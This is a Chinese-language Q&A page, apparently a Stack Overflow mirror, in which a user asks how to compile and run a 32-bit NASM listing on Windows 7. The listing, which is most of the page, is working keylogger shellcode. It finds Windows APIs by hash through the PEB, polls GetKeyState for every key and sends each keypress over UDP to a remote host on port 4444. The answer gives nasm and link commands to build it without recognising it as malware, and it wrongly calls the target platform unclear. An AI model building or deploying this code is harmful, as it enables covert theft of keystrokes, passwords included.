如何在Windows 7 32位上编译/执行以下代码?

时间:2016-11-16 19:52:10

标签: windows compilation execute machine-code

您能告诉我如何在Windows 7 32位机器上执行此代码吗? 我需要编译吗?如果是的话,我该怎么做呢? 生成的文件应该使用哪个扩展名(.exe)?

; NASM (Intel syntax), 32-bit x86. The listing is written as position-independent
; code: nothing is stored in .bss or .data, every string is built on the stack or
; embedded after a `call`, and no import is referenced by name.
section .bss

section .data

section .text
   global _start
      _start:
    cld                         ; DF = 0 so the lodsb loops further down walk strings forward
    ; The call pushes the address of the next instruction (the `pushad` that follows)
    ; and transfers to loc_88h, whose first instruction pops that address into ebp.
    ; From then on every `call ebp` enters the lookup stub that starts at that pushad.
    call dword loc_88h
    ; ---------------------------------------------------------------------------
    ; Hash-based function lookup stub, entered through `call ebp`.
    ; In:   [esp+4] on entry = 32-bit hash pushed by the caller just before the call;
    ;       the callee's own arguments sit above it on the stack.
    ; Out:  does not return here - it removes the hash, restores the caller's return
    ;       address and jumps into the located function with eax = its address.
    ; How:  walks the loaded-module list reached from fs:[0x30] (the PEB pointer on
    ;       32-bit Windows), hashes each module name and each exported name with a
    ;       rotate-right-13 additive hash, and compares the sum with the requested
    ;       hash. Structure offsets below follow the 32-bit Windows PEB/loader and
    ;       PE export-directory layouts.
    ; NOTE(review): there is no "not found" exit - the list is followed with
    ;       `mov edx,[edx]` and never compared against the list head.
    ; ---------------------------------------------------------------------------
    pushad
    mov ebp,esp                 ; frame: [ebp+0x1c] = saved eax, [ebp+0x20] = return address, [ebp+0x24] = requested hash
    xor eax,eax
    mov edx,[fs:eax+0x30]       ; edx = PEB
    mov edx,[edx+0xc]           ; edx = PEB loader data
    mov edx,[edx+0x14]          ; edx = first entry of the in-memory-order module list
    loc_15h:
    mov esi,[edx+0x28]          ; esi = module name buffer (UTF-16)
    movzx ecx,word [edx+0x26]   ; ecx = byte count of that buffer
    xor edi,edi                 ; edi = running module-name hash
loc_1eh:
    lodsb
    cmp al,0x61                 ; bytes >= 'a' are shifted to upper case (signed compare)
    jl loc_25h
    sub al,0x20
loc_25h:
    ror edi,byte 0xd
    add edi,eax
    loop loc_1eh
    push edx                    ; [ebp-4] = current list entry
    push edi                    ; [ebp-8] = module-name hash
    mov edx,[edx+0x10]          ; edx = module base address
    mov ecx,[edx+0x3c]          ; ecx = offset of the PE header
    mov ecx,[ecx+edx+0x78]      ; ecx = export directory RVA
    jecxz loc_82h               ; no export directory: try the next module
    add ecx,edx
    push ecx                    ; keep the export directory address
    mov ebx,[ecx+0x20]          ; RVA of the export name-pointer table
    add ebx,edx
    mov ecx,[ecx+0x18]          ; ecx = number of exported names
loc_45h:
    jecxz loc_81h               ; all names tried: try the next module
    dec ecx                     ; names are scanned from last to first
    mov esi,[ebx+ecx*4]
    add esi,edx                 ; esi = exported name string
    xor edi,edi
loc_4fh:
    lodsb
    ror edi,byte 0xd
    add edi,eax
    cmp al,ah                   ; ah is 0 here, so this stops after the terminating NUL is hashed
    jnz loc_4fh
    add edi,[ebp-0x8]           ; combine with the module-name hash
    cmp edi,[ebp+0x24]          ; equal to the hash the caller asked for?
    jnz loc_45h
    pop eax                     ; eax = export directory address
    mov ebx,[eax+0x24]          ; ordinal table
    add ebx,edx
    mov cx,[ebx+ecx*2]          ; cx = ordinal of the matching name
    mov ebx,[eax+0x1c]          ; function address table
    add ebx,edx
    mov eax,[ebx+ecx*4]
    add eax,edx                 ; eax = address of the located function
    mov [esp+0x24],eax          ; overwrite the saved-eax slot so popad restores eax = function address
    pop ebx                     ; discard module hash
    pop ebx                     ; discard list entry
    popad
    pop ecx                     ; ecx = caller's return address
    pop edx                     ; drop the hash argument
    push ecx                    ; put the return address back for the target function
    jmp eax                     ; tail-jump: the function returns straight to the original caller
loc_81h:
    pop edi                     ; discard export directory address
loc_82h:
    pop edi                     ; discard module hash
    pop edx                     ; edx = current list entry
    mov edx,[edx]               ; follow the forward link to the next module
    jmp short loc_15h
; Network set-up. Each `push dword <hash>` / `call ebp` pair asks the lookup stub
; (the code starting at the pushad after _start) to find a function by hash and jump
; to it. The API names given below are inferred from the arguments and from commonly
; published values of this hash scheme - NOTE(review): confirm each hash independently.
loc_88h:
    pop ebp                     ; ebp = return address of the call in _start = lookup stub
    push dword 0x3233 
    push dword 0x5f327377       ; stack now holds the string "ws2_32",0
    push esp                    ; argument: pointer to that string
    push dword 0x726774c        ; presumably LoadLibraryA (argument is a DLL name)
    call ebp
    mov eax,0x190
    sub esp,eax                 ; reserve a 0x190-byte buffer on the stack
    push esp                    ; argument: pointer to the buffer
    push eax                    ; argument: 0x190
    push dword 0x6b8029         ; presumably WSAStartup(0x190, buffer)
    call ebp
    push byte +0x10             ; stays on the stack across the calls that follow
    jmp dword loc_1ceh          ; the call at loc_1ceh comes back to loc_b2h with the host string address pushed
loc_b2h:
    push dword 0x803428a9       ; one argument (host name string); presumably gethostbyname
    call ebp
    ; Reads the dword at [eax+0x1c] by pointing esp at it and popping; the result is
    ; not checked for NULL first.
    ; presumably this dword is the resolved IPv4 address - TODO confirm the layout assumed
    lea esi,[eax+0x1c]
    xchg esi,esp
    pop eax
    xchg esp,esi
    mov esi,eax                 ; esi = that dword
    push dword 0x6c6c
    push dword 0x642e7472
    push dword 0x6376736d       ; stack now holds the string "msvcrt.dll",0
    push esp
    push dword 0x726774c        ; same hash as the first lookup (presumably LoadLibraryA)
    call ebp
    jmp dword loc_1e3h          ; the call at loc_1e3h comes back to loc_dfh with the port string address pushed
loc_dfh:
    push dword 0xd1ecd1f        ; one argument (decimal port string); presumably a string-to-integer routine such as atoi - TODO confirm
    call ebp
    xchg ah,al                  ; swap the two low bytes: port to big-endian order
    ror eax,byte 0x10           ; move the port into the upper 16 bits
    inc eax
    inc eax                     ; low word = 2 (AF_INET)
    push esi                    ; address dword
    push eax                    ; family and port dword
    mov esi,esp                 ; esi = pointer to the socket address built on the stack
    xor eax,eax
    push eax
    push eax
    push eax
    push eax                    ; four zero arguments
    inc eax
    inc eax
    push eax                    ; 2 - as a Winsock socket type this is SOCK_DGRAM
    push eax                    ; 2 - as an address family this is AF_INET
    push dword 0xe0df0fea       ; six arguments; presumably WSASocketA
    call ebp
    mov edi,eax                 ; edi = socket handle
; Connect with retry. esi = pointer to the socket address on the stack, edi = socket
; handle, ebp = lookup stub. API names are inferred from argument shape and from
; commonly published hash values - NOTE(review): confirm.
loc_104h:
    push byte +0x10             ; address length (16)
    push esi                    ; socket address pointer
    push edi                    ; socket handle
    push dword 0x6174a599       ; presumably connect(s, addr, 16)
    call ebp
    test eax,eax
    jz loc_122h                 ; zero return = success
    ; [esi+0x8] is used as the retry counter; no instruction in this listing stores a
    ; count there explicitly, so its starting value is whatever earlier pushes left in
    ; that stack slot - NOTE(review): confirm the intended retry count.
    dec dword [esi+0x8]
    jnz loc_104h
    xor eax,eax
    push eax                    ; argument: 0
    push dword 0x56a2b5f0       ; presumably ExitProcess(0) once the counter reaches zero
    call ebp
; Resolves one function from user32 by name and lays out the state used by the
; polling loop that follows. ebp = lookup stub, esi = socket address pointer,
; edi = socket handle. API names for the hashes are inferred - NOTE(review): confirm.
loc_122h:
    push dword 0x3233
    push dword 0x72657375       ; stack now holds the string "user32",0
    push esp
    push dword 0x726774c        ; presumably LoadLibraryA; eax = module handle
    call ebp
    push dword 0x657461
    push dword 0x74537965
    push dword 0x4b746547       ; stack now holds the string "GetKeyState",0
    push esp                    ; argument: function name
    push eax                    ; argument: module handle returned above
    push dword 0x7802f749       ; (handle, name) arguments; presumably GetProcAddress
    call ebp
    push esi                    ; saved: socket address pointer
    push edi                    ; saved: socket handle
    push eax                    ; saved: address returned for "GetKeyState"
    xor ecx,ecx
    mov esi,ecx
    mov cl,0x8
loc_155h:
    push esi                    ; 8 zero dwords = 256-bit bitmap at [esp], one bit per key code
    loop loc_155h
    ; Resulting layout: [esp..esp+0x1f] bitmap, [esp+0x20] function pointer,
    ; [esp+0x24] socket handle, [esp+0x28] socket address pointer.
; Key-state polling loop. Stack layout on entry to each pass: [esp..esp+0x1f] 256-bit
; bitmap of keys already reported, [esp+0x20] pointer obtained for "GetKeyState",
; [esp+0x24] socket handle, [esp+0x28] socket address pointer. ebp = lookup stub.
; For every key code 1..0xff the state is queried; a key seen down for the first time
; has its bit set and its one-byte code sent on the socket, a key seen up has its bit
; cleared. API names for the hashes are inferred - NOTE(review): confirm.
loc_158h:
    xor ecx,ecx
    xor esi,esi                 ; esi = key code, restarted from 0 on every pass
    push byte +0x8              ; argument: 8
    push dword 0xe035f044       ; one argument; presumably Sleep(8)
    call ebp
loc_165h:
    mov eax,esi
    cmp al,0xff
    jnc loc_158h                ; code 0xff already polled: pause and start a new pass
    inc esi
    push esi                    ; argument: key code
    call dword [esp+0x24]       ; the push moved esp by 4, so this is the saved function pointer
    mov edx,esi
    xor ecx,ecx
    mov cl,0x80
    and eax,ecx                 ; keep bit 0x80 of the return value
    xor ecx,ecx
    cmp eax,ecx
    jnz loc_18fh                ; bit set: treated as "key is down"
    xor edx,edx                 ; key is up: clear its bit
    mov ecx,edx
    mov eax,esi
    mov cl,0x20
    div ecx                     ; eax = code / 32 (dword index), edx = code % 32 (bit index)
    btr [esp+eax*4],edx
    jmp short loc_165h
loc_18fh:
    xor edx,edx
    mov ecx,edx
    mov eax,esi
    mov cl,0x20
    div ecx
    bt [esp+eax*4],edx
    jc loc_165h                 ; bit already set: this key press was reported earlier
    xor edx,edx
    mov ecx,edx
    mov eax,esi
    mov cl,0x20
    div ecx
    bts [esp+eax*4],edx         ; mark the key as reported
    push esi                    ; the key code on the stack doubles as the 1-byte send buffer
    push byte +0x10             ; address length (16)
    push dword [esp+0x30]       ; saved socket address pointer (offset adjusted for the 2 pushes above)
    push byte +0x0              ; flags = 0
    push byte +0x1              ; length = 1 byte
    lea ecx,[esp+0x10]
    push ecx                    ; pointer to the pushed key code
    push dword [esp+0x3c]       ; saved socket handle (offset adjusted for the 6 pushes above)
    push dword 0xdf5c9d75       ; six arguments (socket, buf, len, flags, addr, addrlen); presumably sendto
    call ebp
    lea esp,[esp+0x4]           ; drop the pushed key code
    jmp short loc_158h
; Embedded strings. Each `call` pushes the address of the bytes that follow it as
; its return address, which the target then consumes as a string pointer argument;
; control never returns to the db data.
loc_1ceh:
    call dword loc_b2h
    db "www.example.com",0      ; destination host name (passed to the name-resolution call at loc_b2h)
loc_1e3h:
    call dword loc_dfh
    db "4444",0                 ; destination port as a decimal string (converted at loc_dfh)

1 个答案:

答案 0 :(得分:1)

这看起来像32位NASM汇编代码(A simple beginners introduction)。您可以使用NASM网站上的this installer 来汇编它(而不是编译它)(在回答时版本为2.12.02)。

在Windows 7上汇编并链接它的方法如下:

如果您有Microsoft C编译器,那么您(在某处)有来自Microsoft的名为link.exe的链接器。如果没有,可以下载Windows 7 SDK,它提供C编译器和链接器(link.exe)。

nasm -f win32 yourProg.asm
link /entry:_start /subsystem:console yourProg.obj <locationOfYour>\kernel32.lib

但是快速浏览代码就可以看出,其中没有明显命名的API调用,因此目标平台(Windows、Linux、MacOS或其他)很难确定。所以这段代码可能可以汇编,但执行它可能(!)毫无用处(除非在调试器中运行)。